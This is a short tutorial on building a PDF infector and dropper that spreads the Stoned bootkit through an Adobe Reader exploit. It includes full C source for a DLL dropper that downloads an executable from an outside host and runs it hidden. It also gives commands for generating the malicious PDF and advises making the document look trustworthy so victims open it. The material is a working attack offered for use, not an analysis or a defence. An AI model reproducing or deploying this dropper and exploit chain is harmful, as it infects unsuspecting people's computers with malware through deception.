Building a Stoned v2 PDF Infector and Dropper The PDF infector infects the computer with Stoned by just simply viewing the PDF file, the dropper downloads first the latest version of Stoned from the internet. 1. We use the new PDF exploit available from http://milw0rm.org/exploits/9579, download the package. It works for Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 and Windows XP. You need Python 2 and Visual C++ installed (both free available). 2. Open the "Visual Studio 2008-Eingabeaufforderung" (Visual Studio command line prompt) Following code is the code for the dropper that downloads the infector from the internet and executes it. Save it as Stoned.c and run "cl /LD Stoned.c": #include "windows.h" #pragma comment(lib, "urlmon") #pragma comment(lib, "shell32") void StonedDropper() { // download & execute Stoned URLDownloadToFileA(NULL, "http://www.stoned-vienna.com/downloads/PDF Spread/Stoned v2.exe", "Stoned v2.exe", 0, NULL); ShellExecute(NULL, "open", "Stoned v2.exe", NULL, NULL, SW_HIDE); // lets open the "infected pdf notice" URLDownloadToFileA(NULL, "http://www.stoned-vienna.com/downloads/PDF Spread/You got infected.pdf", "You got infected.pdf", 0, NULL); ShellExecute(NULL, "open", "You got infected.pdf", NULL, NULL, SW_SHOW); ExitProcess(0); } BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason, LPVOID lpReserved) { int r; if (ul_reason == DLL_PROCESS_ATTACH) CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)StonedDropper, NULL, 0, &r); return TRUE; } Unfortunately this specific PDF exploit does not allow big files as payload, so the infector cannot directly be embedded into the PDF (only the small dropper). However, for other exploits, you can use the dll version of the infector http://www.stoned-vienna.com/downloads/PDF Spread/Stoned.dll (a LoadLibrary will do it). 3. Create the malicious PDF, in the package execute: evil_pdf.py Stoned.pdf Stoned.dll You should also consider changing the displayed text of the PDF to something trustworthy, use CAD-KAS PDF Editor to edit the Stoned.pdf. 4. Everyone who opens Stond.pdf get's stoned!